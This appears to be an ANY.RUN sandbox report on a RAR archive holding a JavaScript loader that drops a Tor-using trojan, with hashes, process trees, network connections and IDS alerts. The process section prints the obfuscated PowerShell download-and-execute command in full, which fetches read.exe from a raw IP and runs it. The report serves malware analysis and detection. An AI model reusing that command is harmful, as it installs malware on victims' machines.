analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

notice_0742.rar

Full analysis: https://app.any.run/tasks/f57cd97b-616c-41ac-95df-fb4ecaceacb7
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: June 18, 2019, 19:27:06
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
trojan
Indicators:
MIME: application/x-rar
File info: RAR archive data, v5
MD5:

CAB66E0A8D80F1157406E7129ECCA5D5

SHA1:

60A5D6292439BEB5B2B6353FD9679D99F0203279

SHA256:

64F85BF6E24385B16C9945354A879A574A368CC1FEF574621695862BD56B29F5

SSDEEP:

192:dLwLFRcp6Bt21kba/upsr4R5QDaZPHEfZYW7s7dd8:dcL7c4Bt26eSsrIQmZsfygs7dd8

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 5659.exe (PID: 3392)
      • 5659.exe (PID: 2368)
      • 5659.exe (PID: 2512)
      • 5659.exe (PID: 3064)
      • 5659.exe (PID: 3176)
      • 5659.exe (PID: 776)
      • 5659.exe (PID: 3284)
      • 5659.exe (PID: 1144)
      • 5659.exe (PID: 864)
      • 5659.exe (PID: 2480)
      • 5659.exe (PID: 688)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2972)
      • cmd.exe (PID: 4076)
      • cmd.exe (PID: 3112)
      • cmd.exe (PID: 2736)
      • cmd.exe (PID: 1836)
      • cmd.exe (PID: 1492)
      • cmd.exe (PID: 1160)
      • cmd.exe (PID: 2564)
    • Loads dropped or rewritten executable

      • 5659.exe (PID: 3392)
      • 5659.exe (PID: 2512)
      • 5659.exe (PID: 3064)
      • 5659.exe (PID: 3176)
      • 5659.exe (PID: 1144)
      • 5659.exe (PID: 776)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3568)
    • Downloads executable files from IP

      • powershell.exe (PID: 3568)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • WScript.exe (PID: 2636)
      • WScript.exe (PID: 3124)
      • WScript.exe (PID: 4052)
      • WScript.exe (PID: 3308)
      • WScript.exe (PID: 3528)
      • WScript.exe (PID: 3448)
      • WScript.exe (PID: 3992)
      • WScript.exe (PID: 3884)
    • Creates files in the user directory

      • powershell.exe (PID: 3568)
      • notepad++.exe (PID: 3588)
      • powershell.exe (PID: 3416)
      • powershell.exe (PID: 3256)
      • powershell.exe (PID: 2920)
      • powershell.exe (PID: 3240)
      • powershell.exe (PID: 3356)
      • powershell.exe (PID: 2860)
      • powershell.exe (PID: 3144)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3568)
      • 5659.exe (PID: 3392)
      • 5659.exe (PID: 2512)
      • 5659.exe (PID: 3064)
      • 5659.exe (PID: 1144)
      • 5659.exe (PID: 3176)
      • 5659.exe (PID: 776)
    • Application launched itself

      • 5659.exe (PID: 3392)
      • 5659.exe (PID: 2512)
      • 5659.exe (PID: 3064)
    • Reads Internet Cache Settings

      • powershell.exe (PID: 3416)
      • powershell.exe (PID: 3256)
      • powershell.exe (PID: 3356)
      • powershell.exe (PID: 2920)
      • powershell.exe (PID: 3240)
      • powershell.exe (PID: 3144)
  • INFO

    • Manual execution by user

      • WScript.exe (PID: 2636)
      • notepad++.exe (PID: 3588)
      • WScript.exe (PID: 3124)
      • WScript.exe (PID: 4052)
      • WScript.exe (PID: 3992)
      • WScript.exe (PID: 3308)
      • WScript.exe (PID: 3528)
      • WScript.exe (PID: 3884)
      • WScript.exe (PID: 3448)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rar | RAR compressed archive (v5.0) (61.5)
.rar | RAR compressed archive (gen) (38.4)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
79
Monitored processes
38
Malicious processes
16
Suspicious processes
6

Behavior graph

Click at the process to see the details
start drop and start winrar.exe no specs wscript.exe no specs cmd.exe no specs powershell.exe 5659.exe 5659.exe notepad++.exe gup.exe wscript.exe no specs cmd.exe no specs powershell.exe wscript.exe no specs 5659.exe cmd.exe no specs powershell.exe wscript.exe no specs wscript.exe no specs cmd.exe no specs powershell.exe wscript.exe no specs 5659.exe wscript.exe no specs cmd.exe no specs wscript.exe no specs powershell.exe cmd.exe no specs cmd.exe no specs powershell.exe no specs cmd.exe no specs powershell.exe powershell.exe no specs 5659.exe 5659.exe 5659.exe 5659.exe no specs 5659.exe no specs 5659.exe no specs 5659.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2832"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\notice_0742.rar"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.60.0
2636"C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\legal_doc_0742.js" C:\Windows\System32\WScript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
2972"C:\Windows\System32\cmd.exe" /c powershell.exe $esPctm = 'guCm7czI';$x = new-object -comobject 'msxml2.xmlhttp';$vQH7TdhI = 'WiSjlExbi';$a = new-object -comobject 'adodb.stream';$bb4w56w = 'EfnbGJtb';$x.open('get', 'http://185.234.216.76/read.exe', 0);$T7XP2n = 'IgkPwM';$x.send();$yOYNwP = 'jyOrg';$a.open();$jEY9CVF = 'HiSAwI';$a.type = 1;$SpzYj3L = 'liyFvS';$a.write($x.responsebody);$yb2Chb = 'XgaEEy';$a.savetofile('..\5659.exe');$Blq07d = 'wbMqSPfm';$a.close();$sWTK0ecB = 'dSbI81';start-process '..\5659.exe';C:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3568powershell.exe $esPctm = 'guCm7czI';$x = new-object -comobject 'msxml2.xmlhttp';$vQH7TdhI = 'WiSjlExbi';$a = new-object -comobject 'adodb.stream';$bb4w56w = 'EfnbGJtb';$x.open('get', 'http://185.234.216.76/read.exe', 0);$T7XP2n = 'IgkPwM';$x.send();$yOYNwP = 'jyOrg';$a.open();$jEY9CVF = 'HiSAwI';$a.type = 1;$SpzYj3L = 'liyFvS';$a.write($x.responsebody);$yb2Chb = 'XgaEEy';$a.savetofile('..\5659.exe');$Blq07d = 'wbMqSPfm';$a.close();$sWTK0ecB = 'dSbI81';start-process '..\5659.exe';C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3392"C:\Users\admin\5659.exe" C:\Users\admin\5659.exe
powershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2368"C:\Users\admin\5659.exe" C:\Users\admin\5659.exe
5659.exe
User:
admin
Integrity Level:
MEDIUM
3588"C:\Program Files\Notepad++\notepad++.exe" "C:\Users\admin\Desktop\legal_doc_0742.js"C:\Program Files\Notepad++\notepad++.exe
explorer.exe
User:
admin
Company:
Integrity Level:
MEDIUM
Description:
Notepad++ : a free (GNU) source code editor
Exit code:
0
Version:
7.51
3948"C:\Program Files\Notepad++\updater\gup.exe" -v7.51C:\Program Files\Notepad++\updater\gup.exe
notepad++.exe
User:
admin
Company:
Integrity Level:
MEDIUM
Description:
GUP : a free (LGPL) Generic Updater
Exit code:
0
Version:
4.1
3124"C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\legal_doc_0742.js" C:\Windows\System32\WScript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
4076"C:\Windows\System32\cmd.exe" /c powershell.exe $esPctm = 'guCm7czI';$x = new-object -comobject 'msxml2.xmlhttp';$vQH7TdhI = 'WiSjlExbi';$a = new-object -comobject 'adodb.stream';$bb4w56w = 'EfnbGJtb';$x.open('get', 'http://185.234.216.76/read.exe', 0);$T7XP2n = 'IgkPwM';$x.send();$yOYNwP = 'jyOrg';$a.open();$jEY9CVF = 'HiSAwI';$a.type = 1;$SpzYj3L = 'liyFvS';$a.write($x.responsebody);$yb2Chb = 'XgaEEy';$a.savetofile('..\5659.exe');$Blq07d = 'wbMqSPfm';$a.close();$sWTK0ecB = 'dSbI81';start-process '..\5659.exe';C:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
5 437
Read events
4 868
Write events
0
Delete events
0

Modification events

No data
Executable files
8
Suspicious files
22
Text files
17
Unknown types
0

Dropped files

PID
Process
Filename
Type
3568powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MGCIRWN4NWZ7HADAQ0CZ.temp
MD5:
SHA256:
3416powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3UYG4YA62H3KQB662Z0R.temp
MD5:
SHA256:
3256powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\97191JC1CPWZHIA9Q3IO.temp
MD5:
SHA256:
3568powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:5F9A7BF5388376D94C2EDCA422810BEC
SHA256:8B2183F4F2F735C231B1F81D46CB86CB1FB51168824DE82F3A9EA79C12CAF82C
3568powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF156aaa.TMPbinary
MD5:5F9A7BF5388376D94C2EDCA422810BEC
SHA256:8B2183F4F2F735C231B1F81D46CB86CB1FB51168824DE82F3A9EA79C12CAF82C
2832WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRb2832.6093\legal_doc_0742.jstext
MD5:8A82D20AD65C89CAC3AF9AC0A8D09CA0
SHA256:B1DC2EC6903AE40D4213ED93C5AC3255B5064550A85E070C0B9C547221739409
2920powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\C8KZY70L88P7BT82MOSQ.temp
MD5:
SHA256:
3356powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\33AMCCB23N2NBDVN7LK1.temp
MD5:
SHA256:
3356powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF181400.TMP
MD5:
SHA256:
3356powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
28
TCP/UDP connections
37
DNS requests
4
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2368
5659.exe
GET
46.28.110.244:80
http://46.28.110.244/tor/server/fp/dcaa1ced7183b561d18cf580be9933bd9168d101
CZ
suspicious
2368
5659.exe
GET
5.9.158.75:80
http://5.9.158.75/tor/server/fp/d15aff44be641368b958a32fb6b071ac2136b8b1
DE
suspicious
2368
5659.exe
GET
206.55.74.0:80
http://206.55.74.0/tor/server/fp/58332ddda15415cb3d13f5eca3d54be961b8c458
US
suspicious
2368
5659.exe
GET
185.65.206.154:80
http://185.65.206.154/tor/server/fp/f23358fa0f4520806d2d23e3d814e46d46e94b18
TR
suspicious
2368
5659.exe
GET
163.172.211.40:80
http://163.172.211.40/tor/server/fp/0b424b9509ac0891776f53cfeec3d44751610231
NL
suspicious
2368
5659.exe
GET
131.188.40.189:80
http://131.188.40.189/tor/status-vote/current/consensus
DE
malicious
2368
5659.exe
GET
51.15.36.183:80
http://51.15.36.183/tor/server/fp/20a41cd42769aeb663fb8ca92802cc6edc538da5
NL
suspicious
2368
5659.exe
GET
50.7.115.12:80
http://50.7.115.12/tor/server/fp/abf940561a8e528559747d2237847e1bd823cdb8
AT
suspicious
2368
5659.exe
GET
185.125.33.58:80
http://185.125.33.58/tor/server/fp/8d093c9c2b42bc224a5319a660a6cf5edefe839f
TR
suspicious
2368
5659.exe
GET
136.243.243.6:80
http://136.243.243.6/tor/server/fp/7202a9449ec084a305eb19a2a2a0e245fa8c111e
DE
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2368
5659.exe
131.188.40.189:80
Verein zur Foerderung eines Deutschen Forschungsnetzes e.V.
DE
malicious
2368
5659.exe
51.254.147.57:443
OVH SAS
FR
suspicious
2368
5659.exe
107.22.215.20:443
api.ipify.org
Amazon.com, Inc.
US
malicious
2368
5659.exe
5.9.158.75:80
Hetzner Online GmbH
DE
suspicious
2368
5659.exe
129.6.15.28:13
time-a.nist.gov
National Bureau of Standards
US
unknown
3568
powershell.exe
185.234.216.76:80
malicious
2368
5659.exe
206.55.74.0:80
sol.net Network Services
US
suspicious
2368
5659.exe
51.15.36.183:80
Online S.a.s.
NL
suspicious
2368
5659.exe
176.10.99.209:443
SOFTplus Entwicklungen GmbH
CH
malicious
2368
5659.exe
50.7.115.12:80
Cogent Communications
AT
suspicious

DNS requests

Domain
IP
Reputation
api.ipify.org
  • 107.22.215.20
  • 54.243.198.12
  • 54.243.147.226
  • 50.19.247.198
  • 54.204.36.156
  • 50.16.229.140
  • 23.21.121.219
  • 54.235.124.112
shared
time-a.nist.gov
  • 129.6.15.28
whitelisted
notepad-plus-plus.org
  • 37.59.28.236
whitelisted
isrg.trustid.ocsp.identrust.com
  • 2.16.186.35
  • 2.16.186.11
whitelisted

Threats

PID
Process
Class
Message
3568
powershell.exe
A Network Trojan was detected
ET INFO Executable Download from dotted-quad Host
3568
powershell.exe
A Network Trojan was detected
ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M1
3568
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3568
powershell.exe
A Network Trojan was detected
ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M2
3568
powershell.exe
Potentially Bad Traffic
ET INFO SUSPICIOUS Dotted Quad Host MZ Response
2368
5659.exe
Misc Attack
ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 123
2368
5659.exe
Misc activity
SUSPICIOUS [PTsecurity] ipify.org External IP Check
2368
5659.exe
Misc activity
SUSPICIOUS [PTsecurity] ipify.org External IP Check
2368
5659.exe
Misc activity
SUSPICIOUS [PTsecurity] ipify.org External IP Check
2368
5659.exe
Misc activity
SUSPICIOUS [PTsecurity] ipify.org External IP Check
1 ETPRO signatures available at the full report
Process
Message
notepad++.exe
VerifyLibrary: C:\Program Files\Notepad++\SciLexer.dll
notepad++.exe
VerifyLibrary: certificate revocation checking is disabled
notepad++.exe
42C4C5846BB675C74E2B2C90C69AB44366401093